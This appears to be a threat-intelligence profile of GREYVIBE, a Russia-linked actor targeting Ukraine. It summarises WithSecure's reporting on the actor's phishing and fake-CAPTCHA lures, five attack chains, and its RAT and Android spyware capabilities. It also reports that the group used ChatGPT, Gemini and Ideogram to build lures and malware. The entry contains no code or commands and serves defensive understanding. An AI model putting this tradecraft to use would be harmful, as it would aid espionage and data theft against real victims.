GREYVIBE

GREYVIBE is a previously undocumented, Russia-linked threat actor tracked by WithSecure and active since at least August 2025. The group has persistently targeted Ukraine and Ukraine-related entities across military, government, civilian, and business sectors. WithSecure assessed that GREYVIBE’s targeting, lures, and post-compromise objectives align with Russian state intelligence interests in the context of the Russia-Ukraine war, while also identifying ties to the broader cybercrime ecosystem. Researchers reported that the operators and developers are Russian-speaking and operate broadly in the Moscow time zone. GREYVIBE uses multiple delivery vectors, including spear-phishing emails, fake CAPTCHA or verification pages, fraudulent Ukrainian adult-club websites, and charity-themed lure sites. Its activity has been grouped into five attack chains: PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo. PhantomMail used spear-phishing emails linking to malicious ZIP or RAR archives hosted on services such as Google Drive and 4sync; these archives contained JavaScript-based or PyInstaller-based loaders that launched decoy documents and deployed PhantomRelay. PhantomClick used ClickFix-style fake CAPTCHA pages impersonating services such as Zoom and LAPAS and tricked victims into executing commands that installed PhantomRelay. PrincessClub used fake Ukrainian adult-club websites and fake female Telegram personas to target victims, including confirmed Ukrainian combatants in Kharkiv, delivering FallSpy on Android and PhantomRelayV1 or LegionRelay on Windows; later versions added WebRTC-based live call functionality to capture victim audio and video. DroneLink used websites masquerading as charitable foundations supporting the Armed Forces of Ukraine and delivered WireGuard together with LegionRelay. Nebo used FallSpy samples and fake Russian-language login interfaces. Known GREYVIBE malware and tooling include PhantomRelay, LegionRelay, and FallSpy, as well as loaders and obfuscators such as DAYLIGHT, LOOKVALPS, LOOKVALJS, and TEASOUP. PhantomRelay is a modular PowerShell-based RAT using a two-stage execution chain and secure WebSocket communications. LegionRelay is a lightweight PowerShell-based RAT using REST API methods for file enumeration and exfiltration, screenshot capture, browser data theft, Telegram and WhatsApp data theft, messaging database enumeration, and RDP access setup. FallSpy is Android spyware that harvests contacts, call logs, installed applications, SIM-linked phone numbers, device and network information, Wi-Fi SSID, last-known location, public IP, and media files. WithSecure found strong evidence that GREYVIBE systematically used generative AI platforms including ChatGPT, Google Gemini, and Ideogram AI across lure creation, image generation, malware and obfuscator development, backend infrastructure setup, and post-compromise command generation. Researchers assessed that this AI use helped the group accelerate development, compensate for capability gaps, and vary code structures. At the same time, GREYVIBE was described as low-to-moderately sophisticated and prone to operational security mistakes, including exposing backend functionality through design flaws in LegionRelay, uploading test samples to VirusTotal, and leaving development artifacts such as "letsrollboyos," "totallyunsus," and "cuteuwu." WithSecure stated it had not identified definitive links between GREYVIBE and any previously tracked threat group, but assessed with moderate confidence that the actor has ties to the broader cybercrime ecosystem and with low-to-moderate confidence that it may involve current or former cybercriminals. Reported indicators of this overlap include use of an ISO builder with suspected ties to TrickBot and UAC-0098, slang-based artifact naming, deployment of XMRig on a small number of infected machines, and appearance of PhantomRelay variants in unrelated cybercrime activity. Known aliases and campaign or sub-cluster names directly mentioned in the reporting are GREYVIBE, GreyVibe, PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo.